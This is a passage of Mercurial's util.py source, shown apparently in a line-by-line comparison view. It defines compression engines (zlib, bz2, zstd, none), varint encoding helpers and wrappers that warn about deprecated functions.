3305 data. This method returns compressed binary data or ``None`` if
3305 data. This method returns compressed binary data or ``None`` if
3306 the data could not be compressed (too small, not compressible, etc).
3306 the data could not be compressed (too small, not compressible, etc).
3307 The returned data should have a header uniquely identifying this
3307 The returned data should have a header uniquely identifying this
3308 compression format so decompression can be routed to this engine.
3308 compression format so decompression can be routed to this engine.
3309 This header should be identified by the ``revlogheader()`` return
3309 This header should be identified by the ``revlogheader()`` return
3310 value.
3310 value.
3311
3311
3312 The object has a ``decompress(data)`` method that decompresses
3312 The object has a ``decompress(data)`` method that decompresses
3313 data. The method will only be called if ``data`` begins with
3313 data. The method will only be called if ``data`` begins with
3314 ``revlogheader()``. The method should return the raw, uncompressed
3314 ``revlogheader()``. The method should return the raw, uncompressed
3315 data or raise a ``RevlogError``.
3315 data or raise a ``RevlogError``.
3316
3316
3317 The object is reusable but is not thread safe.
3317 The object is reusable but is not thread safe.
3318 """
3318 """
3319 raise NotImplementedError()
3319 raise NotImplementedError()
3320
3320
3321 class _zlibengine(compressionengine):
3321 class _zlibengine(compressionengine):
3322 def name(self):
3322 def name(self):
3323 return 'zlib'
3323 return 'zlib'
3324
3324
3325 def bundletype(self):
3325 def bundletype(self):
3326 """zlib compression using the DEFLATE algorithm.
3326 """zlib compression using the DEFLATE algorithm.
3327
3327
3328 All Mercurial clients should support this format. The compression
3328 All Mercurial clients should support this format. The compression
3329 algorithm strikes a reasonable balance between compression ratio
3329 algorithm strikes a reasonable balance between compression ratio
3330 and size.
3330 and size.
3331 """
3331 """
3332 return 'gzip', 'GZ'
3332 return 'gzip', 'GZ'
3333
3333
3334 def wireprotosupport(self):
3334 def wireprotosupport(self):
3335 return compewireprotosupport('zlib', 20, 20)
3335 return compewireprotosupport('zlib', 20, 20)
3336
3336
3337 def revlogheader(self):
3337 def revlogheader(self):
3338 return 'x'
3338 return 'x'
3339
3339
3340 def compressstream(self, it, opts=None):
3340 def compressstream(self, it, opts=None):
3341 opts = opts or {}
3341 opts = opts or {}
3342
3342
3343 z = zlib.compressobj(opts.get('level', -1))
3343 z = zlib.compressobj(opts.get('level', -1))
3344 for chunk in it:
3344 for chunk in it:
3345 data = z.compress(chunk)
3345 data = z.compress(chunk)
3346 # Not all calls to compress emit data. It is cheaper to inspect
3346 # Not all calls to compress emit data. It is cheaper to inspect
3347 # here than to feed empty chunks through generator.
3347 # here than to feed empty chunks through generator.
3348 if data:
3348 if data:
3349 yield data
3349 yield data
3350
3350
3351 yield z.flush()
3351 yield z.flush()
3352
3352
3353 def decompressorreader(self, fh):
3353 def decompressorreader(self, fh):
3354 def gen():
3354 def gen():
3355 d = zlib.decompressobj()
3355 d = zlib.decompressobj()
3356 for chunk in filechunkiter(fh):
3356 for chunk in filechunkiter(fh):
3357 while chunk:
3357 while chunk:
3358 # Limit output size to limit memory.
3358 # Limit output size to limit memory.
3359 yield d.decompress(chunk, 2 ** 18)
3359 yield d.decompress(chunk, 2 ** 18)
3360 chunk = d.unconsumed_tail
3360 chunk = d.unconsumed_tail
3361
3361
3362 return chunkbuffer(gen())
3362 return chunkbuffer(gen())
3363
3363
3364 class zlibrevlogcompressor(object):
3364 class zlibrevlogcompressor(object):
3365 def compress(self, data):
3365 def compress(self, data):
3366 insize = len(data)
3366 insize = len(data)
3367 # Caller handles empty input case.
3367 # Caller handles empty input case.
3368 assert insize > 0
3368 assert insize > 0
3369
3369
3370 if insize < 44:
3370 if insize < 44:
3371 return None
3371 return None
3372
3372
3373 elif insize <= 1000000:
3373 elif insize <= 1000000:
3374 compressed = zlib.compress(data)
3374 compressed = zlib.compress(data)
3375 if len(compressed) < insize:
3375 if len(compressed) < insize:
3376 return compressed
3376 return compressed
3377 return None
3377 return None
3378
3378
3379 # zlib makes an internal copy of the input buffer, doubling
3379 # zlib makes an internal copy of the input buffer, doubling
3380 # memory usage for large inputs. So do streaming compression
3380 # memory usage for large inputs. So do streaming compression
3381 # on large inputs.
3381 # on large inputs.
3382 else:
3382 else:
3383 z = zlib.compressobj()
3383 z = zlib.compressobj()
3384 parts = []
3384 parts = []
3385 pos = 0
3385 pos = 0
3386 while pos < insize:
3386 while pos < insize:
3387 pos2 = pos + 2**20
3387 pos2 = pos + 2**20
3388 parts.append(z.compress(data[pos:pos2]))
3388 parts.append(z.compress(data[pos:pos2]))
3389 pos = pos2
3389 pos = pos2
3390 parts.append(z.flush())
3390 parts.append(z.flush())
3391
3391
3392 if sum(map(len, parts)) < insize:
3392 if sum(map(len, parts)) < insize:
3393 return ''.join(parts)
3393 return ''.join(parts)
3394 return None
3394 return None
3395
3395
3396 def decompress(self, data):
3396 def decompress(self, data):
3397 try:
3397 try:
3398 return zlib.decompress(data)
3398 return zlib.decompress(data)
3399 except zlib.error as e:
3399 except zlib.error as e:
3400 raise error.RevlogError(_('revlog decompress error: %s') %
3400 raise error.RevlogError(_('revlog decompress error: %s') %
3401 stringutil.forcebytestr(e))
3401 stringutil.forcebytestr(e))
3402
3402
3403 def revlogcompressor(self, opts=None):
3403 def revlogcompressor(self, opts=None):
3404 return self.zlibrevlogcompressor()
3404 return self.zlibrevlogcompressor()
3405
3405
3406 compengines.register(_zlibengine())
3406 compengines.register(_zlibengine())
3407
3407
3408 class _bz2engine(compressionengine):
3408 class _bz2engine(compressionengine):
3409 def name(self):
3409 def name(self):
3410 return 'bz2'
3410 return 'bz2'
3411
3411
3412 def bundletype(self):
3412 def bundletype(self):
3413 """An algorithm that produces smaller bundles than ``gzip``.
3413 """An algorithm that produces smaller bundles than ``gzip``.
3414
3414
3415 All Mercurial clients should support this format.
3415 All Mercurial clients should support this format.
3416
3416
3417 This engine will likely produce smaller bundles than ``gzip`` but
3417 This engine will likely produce smaller bundles than ``gzip`` but
3418 will be significantly slower, both during compression and
3418 will be significantly slower, both during compression and
3419 decompression.
3419 decompression.
3420
3420
3421 If available, the ``zstd`` engine can yield similar or better
3421 If available, the ``zstd`` engine can yield similar or better
3422 compression at much higher speeds.
3422 compression at much higher speeds.
3423 """
3423 """
3424 return 'bzip2', 'BZ'
3424 return 'bzip2', 'BZ'
3425
3425
3426 # We declare a protocol name but don't advertise by default because
3426 # We declare a protocol name but don't advertise by default because
3427 # it is slow.
3427 # it is slow.
3428 def wireprotosupport(self):
3428 def wireprotosupport(self):
3429 return compewireprotosupport('bzip2', 0, 0)
3429 return compewireprotosupport('bzip2', 0, 0)
3430
3430
3431 def compressstream(self, it, opts=None):
3431 def compressstream(self, it, opts=None):
3432 opts = opts or {}
3432 opts = opts or {}
3433 z = bz2.BZ2Compressor(opts.get('level', 9))
3433 z = bz2.BZ2Compressor(opts.get('level', 9))
3434 for chunk in it:
3434 for chunk in it:
3435 data = z.compress(chunk)
3435 data = z.compress(chunk)
3436 if data:
3436 if data:
3437 yield data
3437 yield data
3438
3438
3439 yield z.flush()
3439 yield z.flush()
3440
3440
3441 def decompressorreader(self, fh):
3441 def decompressorreader(self, fh):
3442 def gen():
3442 def gen():
3443 d = bz2.BZ2Decompressor()
3443 d = bz2.BZ2Decompressor()
3444 for chunk in filechunkiter(fh):
3444 for chunk in filechunkiter(fh):
3445 yield d.decompress(chunk)
3445 yield d.decompress(chunk)
3446
3446
3447 return chunkbuffer(gen())
3447 return chunkbuffer(gen())
3448
3448
3449 compengines.register(_bz2engine())
3449 compengines.register(_bz2engine())
3450
3450
3451 class _truncatedbz2engine(compressionengine):
3451 class _truncatedbz2engine(compressionengine):
3452 def name(self):
3452 def name(self):
3453 return 'bz2truncated'
3453 return 'bz2truncated'
3454
3454
3455 def bundletype(self):
3455 def bundletype(self):
3456 return None, '_truncatedBZ'
3456 return None, '_truncatedBZ'
3457
3457
3458 # We don't implement compressstream because it is hackily handled elsewhere.
3458 # We don't implement compressstream because it is hackily handled elsewhere.
3459
3459
3460 def decompressorreader(self, fh):
3460 def decompressorreader(self, fh):
3461 def gen():
3461 def gen():
3462 # The input stream doesn't have the 'BZ' header. So add it back.
3462 # The input stream doesn't have the 'BZ' header. So add it back.
3463 d = bz2.BZ2Decompressor()
3463 d = bz2.BZ2Decompressor()
3464 d.decompress('BZ')
3464 d.decompress('BZ')
3465 for chunk in filechunkiter(fh):
3465 for chunk in filechunkiter(fh):
3466 yield d.decompress(chunk)
3466 yield d.decompress(chunk)
3467
3467
3468 return chunkbuffer(gen())
3468 return chunkbuffer(gen())
3469
3469
3470 compengines.register(_truncatedbz2engine())
3470 compengines.register(_truncatedbz2engine())
3471
3471
3472 class _noopengine(compressionengine):
3472 class _noopengine(compressionengine):
3473 def name(self):
3473 def name(self):
3474 return 'none'
3474 return 'none'
3475
3475
3476 def bundletype(self):
3476 def bundletype(self):
3477 """No compression is performed.
3477 """No compression is performed.
3478
3478
3479 Use this compression engine to explicitly disable compression.
3479 Use this compression engine to explicitly disable compression.
3480 """
3480 """
3481 return 'none', 'UN'
3481 return 'none', 'UN'
3482
3482
3483 # Clients always support uncompressed payloads. Servers don't because
3483 # Clients always support uncompressed payloads. Servers don't because
3484 # unless you are on a fast network, uncompressed payloads can easily
3484 # unless you are on a fast network, uncompressed payloads can easily
3485 # saturate your network pipe.
3485 # saturate your network pipe.
3486 def wireprotosupport(self):
3486 def wireprotosupport(self):
3487 return compewireprotosupport('none', 0, 10)
3487 return compewireprotosupport('none', 0, 10)
3488
3488
3489 # We don't implement revlogheader because it is handled specially
3489 # We don't implement revlogheader because it is handled specially
3490 # in the revlog class.
3490 # in the revlog class.
3491
3491
3492 def compressstream(self, it, opts=None):
3492 def compressstream(self, it, opts=None):
3493 return it
3493 return it
3494
3494
3495 def decompressorreader(self, fh):
3495 def decompressorreader(self, fh):
3496 return fh
3496 return fh
3497
3497
3498 class nooprevlogcompressor(object):
3498 class nooprevlogcompressor(object):
3499 def compress(self, data):
3499 def compress(self, data):
3500 return None
3500 return None
3501
3501
3502 def revlogcompressor(self, opts=None):
3502 def revlogcompressor(self, opts=None):
3503 return self.nooprevlogcompressor()
3503 return self.nooprevlogcompressor()
3504
3504
3505 compengines.register(_noopengine())
3505 compengines.register(_noopengine())
3506
3506
3507 class _zstdengine(compressionengine):
3507 class _zstdengine(compressionengine):
3508 def name(self):
3508 def name(self):
3509 return 'zstd'
3509 return 'zstd'
3510
3510
3511 @propertycache
3511 @propertycache
3512 def _module(self):
3512 def _module(self):
3513 # Not all installs have the zstd module available. So defer importing
3513 # Not all installs have the zstd module available. So defer importing
3514 # until first access.
3514 # until first access.
3515 try:
3515 try:
3516 from . import zstd
3516 from . import zstd
3517 # Force delayed import.
3517 # Force delayed import.
3518 zstd.__version__
3518 zstd.__version__
3519 return zstd
3519 return zstd
3520 except ImportError:
3520 except ImportError:
3521 return None
3521 return None
3522
3522
3523 def available(self):
3523 def available(self):
3524 return bool(self._module)
3524 return bool(self._module)
3525
3525
3526 def bundletype(self):
3526 def bundletype(self):
3527 """A modern compression algorithm that is fast and highly flexible.
3527 """A modern compression algorithm that is fast and highly flexible.
3528
3528
3529 Only supported by Mercurial 4.1 and newer clients.
3529 Only supported by Mercurial 4.1 and newer clients.
3530
3530
3531 With the default settings, zstd compression is both faster and yields
3531 With the default settings, zstd compression is both faster and yields
3532 better compression than ``gzip``. It also frequently yields better
3532 better compression than ``gzip``. It also frequently yields better
3533 compression than ``bzip2`` while operating at much higher speeds.
3533 compression than ``bzip2`` while operating at much higher speeds.
3534
3534
3535 If this engine is available and backwards compatibility is not a
3535 If this engine is available and backwards compatibility is not a
3536 concern, it is likely the best available engine.
3536 concern, it is likely the best available engine.
3537 """
3537 """
3538 return 'zstd', 'ZS'
3538 return 'zstd', 'ZS'
3539
3539
3540 def wireprotosupport(self):
3540 def wireprotosupport(self):
3541 return compewireprotosupport('zstd', 50, 50)
3541 return compewireprotosupport('zstd', 50, 50)
3542
3542
3543 def revlogheader(self):
3543 def revlogheader(self):
3544 return '\x28'
3544 return '\x28'
3545
3545
3546 def compressstream(self, it, opts=None):
3546 def compressstream(self, it, opts=None):
3547 opts = opts or {}
3547 opts = opts or {}
3548 # zstd level 3 is almost always significantly faster than zlib
3548 # zstd level 3 is almost always significantly faster than zlib
3549 # while providing no worse compression. It strikes a good balance
3549 # while providing no worse compression. It strikes a good balance
3550 # between speed and compression.
3550 # between speed and compression.
3551 level = opts.get('level', 3)
3551 level = opts.get('level', 3)
3552
3552
3553 zstd = self._module
3553 zstd = self._module
3554 z = zstd.ZstdCompressor(level=level).compressobj()
3554 z = zstd.ZstdCompressor(level=level).compressobj()
3555 for chunk in it:
3555 for chunk in it:
3556 data = z.compress(chunk)
3556 data = z.compress(chunk)
3557 if data:
3557 if data:
3558 yield data
3558 yield data
3559
3559
3560 yield z.flush()
3560 yield z.flush()
3561
3561
3562 def decompressorreader(self, fh):
3562 def decompressorreader(self, fh):
3563 zstd = self._module
3563 zstd = self._module
3564 dctx = zstd.ZstdDecompressor()
3564 dctx = zstd.ZstdDecompressor()
3565 return chunkbuffer(dctx.read_from(fh))
3565 return chunkbuffer(dctx.read_from(fh))
3566
3566
3567 class zstdrevlogcompressor(object):
3567 class zstdrevlogcompressor(object):
3568 def __init__(self, zstd, level=3):
3568 def __init__(self, zstd, level=3):
3569 # TODO consider omitting frame magic to save 4 bytes.
3569 # TODO consider omitting frame magic to save 4 bytes.
3570 # This writes content sizes into the frame header. That is
3570 # This writes content sizes into the frame header. That is
3571 # extra storage. But it allows a correct size memory allocation
3571 # extra storage. But it allows a correct size memory allocation
3572 # to hold the result.
3572 # to hold the result.
3573 self._cctx = zstd.ZstdCompressor(level=level)
3573 self._cctx = zstd.ZstdCompressor(level=level)
3574 self._dctx = zstd.ZstdDecompressor()
3574 self._dctx = zstd.ZstdDecompressor()
3575 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3575 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3576 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3576 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3577
3577
3578 def compress(self, data):
3578 def compress(self, data):
3579 insize = len(data)
3579 insize = len(data)
3580 # Caller handles empty input case.
3580 # Caller handles empty input case.
3581 assert insize > 0
3581 assert insize > 0
3582
3582
3583 if insize < 50:
3583 if insize < 50:
3584 return None
3584 return None
3585
3585
3586 elif insize <= 1000000:
3586 elif insize <= 1000000:
3587 compressed = self._cctx.compress(data)
3587 compressed = self._cctx.compress(data)
3588 if len(compressed) < insize:
3588 if len(compressed) < insize:
3589 return compressed
3589 return compressed
3590 return None
3590 return None
3591 else:
3591 else:
3592 z = self._cctx.compressobj()
3592 z = self._cctx.compressobj()
3593 chunks = []
3593 chunks = []
3594 pos = 0
3594 pos = 0
3595 while pos < insize:
3595 while pos < insize:
3596 pos2 = pos + self._compinsize
3596 pos2 = pos + self._compinsize
3597 chunk = z.compress(data[pos:pos2])
3597 chunk = z.compress(data[pos:pos2])
3598 if chunk:
3598 if chunk:
3599 chunks.append(chunk)
3599 chunks.append(chunk)
3600 pos = pos2
3600 pos = pos2
3601 chunks.append(z.flush())
3601 chunks.append(z.flush())
3602
3602
3603 if sum(map(len, chunks)) < insize:
3603 if sum(map(len, chunks)) < insize:
3604 return ''.join(chunks)
3604 return ''.join(chunks)
3605 return None
3605 return None
3606
3606
3607 def decompress(self, data):
3607 def decompress(self, data):
3608 insize = len(data)
3608 insize = len(data)
3609
3609
3610 try:
3610 try:
3611 # This was measured to be faster than other streaming
3611 # This was measured to be faster than other streaming
3612 # decompressors.
3612 # decompressors.
3613 dobj = self._dctx.decompressobj()
3613 dobj = self._dctx.decompressobj()
3614 chunks = []
3614 chunks = []
3615 pos = 0
3615 pos = 0
3616 while pos < insize:
3616 while pos < insize:
3617 pos2 = pos + self._decompinsize
3617 pos2 = pos + self._decompinsize
3618 chunk = dobj.decompress(data[pos:pos2])
3618 chunk = dobj.decompress(data[pos:pos2])
3619 if chunk:
3619 if chunk:
3620 chunks.append(chunk)
3620 chunks.append(chunk)
3621 pos = pos2
3621 pos = pos2
3622 # Frame should be exhausted, so no finish() API.
3622 # Frame should be exhausted, so no finish() API.
3623
3623
3624 return ''.join(chunks)
3624 return ''.join(chunks)
3625 except Exception as e:
3625 except Exception as e:
3626 raise error.RevlogError(_('revlog decompress error: %s') %
3626 raise error.RevlogError(_('revlog decompress error: %s') %
3627 stringutil.forcebytestr(e))
3627 stringutil.forcebytestr(e))
3628
3628
3629 def revlogcompressor(self, opts=None):
3629 def revlogcompressor(self, opts=None):
3630 opts = opts or {}
3630 opts = opts or {}
3631 return self.zstdrevlogcompressor(self._module,
3631 return self.zstdrevlogcompressor(self._module,
3632 level=opts.get('level', 3))
3632 level=opts.get('level', 3))
3633
3633
3634 compengines.register(_zstdengine())
3634 compengines.register(_zstdengine())
3635
3635
3636 def bundlecompressiontopics():
3636 def bundlecompressiontopics():
3637 """Obtains a list of available bundle compressions for use in help."""
3637 """Obtains a list of available bundle compressions for use in help."""
3638 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3638 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3639 items = {}
3639 items = {}
3640
3640
3641 # We need to format the docstring. So use a dummy object/type to hold it
3641 # We need to format the docstring. So use a dummy object/type to hold it
3642 # rather than mutating the original.
3642 # rather than mutating the original.
3643 class docobject(object):
3643 class docobject(object):
3644 pass
3644 pass
3645
3645
3646 for name in compengines:
3646 for name in compengines:
3647 engine = compengines[name]
3647 engine = compengines[name]
3648
3648
3649 if not engine.available():
3649 if not engine.available():
3650 continue
3650 continue
3651
3651
3652 bt = engine.bundletype()
3652 bt = engine.bundletype()
3653 if not bt or not bt[0]:
3653 if not bt or not bt[0]:
3654 continue
3654 continue
3655
3655
3656 doc = pycompat.sysstr('``%s``\n %s') % (
3656 doc = pycompat.sysstr('``%s``\n %s') % (
3657 bt[0], engine.bundletype.__doc__)
3657 bt[0], engine.bundletype.__doc__)
3658
3658
3659 value = docobject()
3659 value = docobject()
3660 value.__doc__ = doc
3660 value.__doc__ = doc
3661 value._origdoc = engine.bundletype.__doc__
3661 value._origdoc = engine.bundletype.__doc__
3662 value._origfunc = engine.bundletype
3662 value._origfunc = engine.bundletype
3663
3663
3664 items[bt[0]] = value
3664 items[bt[0]] = value
3665
3665
3666 return items
3666 return items
3667
3667
3668 i18nfunctions = bundlecompressiontopics().values()
3668 i18nfunctions = bundlecompressiontopics().values()
3669
3669
3670 # convenient shortcut
3670 # convenient shortcut
3671 dst = debugstacktrace
3671 dst = debugstacktrace
3672
3672
3673 def safename(f, tag, ctx, others=None):
3673 def safename(f, tag, ctx, others=None):
3674 """
3674 """
3675 Generate a name that it is safe to rename f to in the given context.
3675 Generate a name that it is safe to rename f to in the given context.
3676
3676
3677 f: filename to rename
3677 f: filename to rename
3678 tag: a string tag that will be included in the new name
3678 tag: a string tag that will be included in the new name
3679 ctx: a context, in which the new name must not exist
3679 ctx: a context, in which the new name must not exist
3680 others: a set of other filenames that the new name must not be in
3680 others: a set of other filenames that the new name must not be in
3681
3681
3682 Returns a file name of the form oldname~tag[~number] which does not exist
3682 Returns a file name of the form oldname~tag[~number] which does not exist
3683 in the provided context and is not in the set of other names.
3683 in the provided context and is not in the set of other names.
3684 """
3684 """
3685 if others is None:
3685 if others is None:
3686 others = set()
3686 others = set()
3687
3687
3688 fn = '%s~%s' % (f, tag)
3688 fn = '%s~%s' % (f, tag)
3689 if fn not in ctx and fn not in others:
3689 if fn not in ctx and fn not in others:
3690 return fn
3690 return fn
3691 for n in itertools.count(1):
3691 for n in itertools.count(1):
3692 fn = '%s~%s~%s' % (f, tag, n)
3692 fn = '%s~%s~%s' % (f, tag, n)
3693 if fn not in ctx and fn not in others:
3693 if fn not in ctx and fn not in others:
3694 return fn
3694 return fn
3695
3695
3696 def readexactly(stream, n):
3696 def readexactly(stream, n):
3697 '''read n bytes from stream.read and abort if less was available'''
3697 '''read n bytes from stream.read and abort if less was available'''
3698 s = stream.read(n)
3698 s = stream.read(n)
3699 if len(s) < n:
3699 if len(s) < n:
3700 raise error.Abort(_("stream ended unexpectedly"
3700 raise error.Abort(_("stream ended unexpectedly"
3701 " (got %d bytes, expected %d)")
3701 " (got %d bytes, expected %d)")
3702 % (len(s), n))
3702 % (len(s), n))
3703 return s
3703 return s
3704
3704
3705 def uvarintencode(value):
3705 def uvarintencode(value):
3706 """Encode an unsigned integer value to a varint.
3706 """Encode an unsigned integer value to a varint.
3707
3707
3708 A varint is a variable length integer of 1 or more bytes. Each byte
3708 A varint is a variable length integer of 1 or more bytes. Each byte
3709 except the last has the most significant bit set. The lower 7 bits of
3709 except the last has the most significant bit set. The lower 7 bits of
3710 each byte store the 2's complement representation, least significant group
3710 each byte store the 2's complement representation, least significant group
3711 first.
3711 first.
3712
3712
3713 >>> uvarintencode(0)
3713 >>> uvarintencode(0)
3714 '\\x00'
3714 '\\x00'
3715 >>> uvarintencode(1)
3715 >>> uvarintencode(1)
3716 '\\x01'
3716 '\\x01'
3717 >>> uvarintencode(127)
3717 >>> uvarintencode(127)
3718 '\\x7f'
3718 '\\x7f'
3719 >>> uvarintencode(1337)
3719 >>> uvarintencode(1337)
3720 '\\xb9\\n'
3720 '\\xb9\\n'
3721 >>> uvarintencode(65536)
3721 >>> uvarintencode(65536)
3722 '\\x80\\x80\\x04'
3722 '\\x80\\x80\\x04'
3723 >>> uvarintencode(-1)
3723 >>> uvarintencode(-1)
3724 Traceback (most recent call last):
3724 Traceback (most recent call last):
3725 ...
3725 ...
3726 ProgrammingError: negative value for uvarint: -1
3726 ProgrammingError: negative value for uvarint: -1
3727 """
3727 """
3728 if value < 0:
3728 if value < 0:
3729 raise error.ProgrammingError('negative value for uvarint: %d'
3729 raise error.ProgrammingError('negative value for uvarint: %d'
3730 % value)
3730 % value)
3731 bits = value & 0x7f
3731 bits = value & 0x7f
3732 value >>= 7
3732 value >>= 7
3733 bytes = []
3733 bytes = []
3734 while value:
3734 while value:
3735 bytes.append(pycompat.bytechr(0x80 | bits))
3735 bytes.append(pycompat.bytechr(0x80 | bits))
3736 bits = value & 0x7f
3736 bits = value & 0x7f
3737 value >>= 7
3737 value >>= 7
3738 bytes.append(pycompat.bytechr(bits))
3738 bytes.append(pycompat.bytechr(bits))
3739
3739
3740 return ''.join(bytes)
3740 return ''.join(bytes)
3741
3741
3742 def uvarintdecodestream(fh):
3742 def uvarintdecodestream(fh):
3743 """Decode an unsigned variable length integer from a stream.
3743 """Decode an unsigned variable length integer from a stream.
3744
3744
3745 The passed argument is anything that has a ``.read(N)`` method.
3745 The passed argument is anything that has a ``.read(N)`` method.
3746
3746
3747 >>> try:
3747 >>> try:
3748 ... from StringIO import StringIO as BytesIO
3748 ... from StringIO import StringIO as BytesIO
3749 ... except ImportError:
3749 ... except ImportError:
3750 ... from io import BytesIO
3750 ... from io import BytesIO
3751 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3751 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3752 0
3752 0
3753 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3753 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3754 1
3754 1
3755 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3755 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3756 127
3756 127
3757 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3757 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3758 1337
3758 1337
3759 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3759 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3760 65536
3760 65536
3761 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3761 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3762 Traceback (most recent call last):
3762 Traceback (most recent call last):
3763 ...
3763 ...
3764 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3764 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3765 """
3765 """
3766 result = 0
3766 result = 0
3767 shift = 0
3767 shift = 0
3768 while True:
3768 while True:
3769 byte = ord(readexactly(fh, 1))
3769 byte = ord(readexactly(fh, 1))
3770 result |= ((byte & 0x7f) << shift)
3770 result |= ((byte & 0x7f) << shift)
3771 if not (byte & 0x80):
3771 if not (byte & 0x80):
3772 return result
3772 return result
3773 shift += 7
3773 shift += 7
3774
3774
3775 ###
3775 ###
3776 # Deprecation warnings for util.py splitting
3776 # Deprecation warnings for util.py splitting
3777 ###
3777 ###
3778
3778
3779 def _deprecatedfunc(func, version, modname=None):
3779 def _deprecatedfunc(func, version, modname=None):
3780 def wrapped(*args, **kwargs):
3780 def wrapped(*args, **kwargs):
3781 fn = pycompat.sysbytes(func.__name__)
3781 fn = pycompat.sysbytes(func.__name__)
3782 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3782 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3783 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3783 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3784 nouideprecwarn(msg, version)
3784 nouideprecwarn(msg, version, stacklevel=2)
3785 return func(*args, **kwargs)
3785 return func(*args, **kwargs)
3786 wrapped.__name__ = func.__name__
3786 wrapped.__name__ = func.__name__
3787 return wrapped
3787 return wrapped
3788
3788
3789 defaultdateformats = dateutil.defaultdateformats
3789 defaultdateformats = dateutil.defaultdateformats
3790 extendeddateformats = dateutil.extendeddateformats
3790 extendeddateformats = dateutil.extendeddateformats
3791 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3791 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3792 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3792 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3793 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3793 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3794 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3794 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3795 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3795 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3796 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3796 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3797 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3797 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3798
3798
3799 stderr = procutil.stderr
3799 stderr = procutil.stderr
3800 stdin = procutil.stdin
3800 stdin = procutil.stdin
3801 stdout = procutil.stdout
3801 stdout = procutil.stdout
3802 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3802 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3803 modname='utils.procutil')
3803 modname='utils.procutil')
3804 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3804 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3805 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3805 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3806 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3806 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3807 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3807 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3808 modname='utils.procutil')
3808 modname='utils.procutil')
3809 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3809 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3810 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3810 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3811 modname='utils.procutil')
3811 modname='utils.procutil')
3812 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3812 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3813 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3813 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3814 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3814 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3815 modname='utils.procutil')
3815 modname='utils.procutil')
3816 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3816 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3817 modname='utils.procutil')
3817 modname='utils.procutil')
3818 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3818 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3819 modname='utils.procutil')
3819 modname='utils.procutil')
3820 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3820 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3821 modname='utils.procutil')
3821 modname='utils.procutil')
3822 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3822 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3823 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3823 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3824 try:
3824 try:
3825 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3825 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3826 modname='utils.procutil')
3826 modname='utils.procutil')
3827 except AttributeError:
3827 except AttributeError:
3828 pass
3828 pass
3829 try:
3829 try:
3830 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
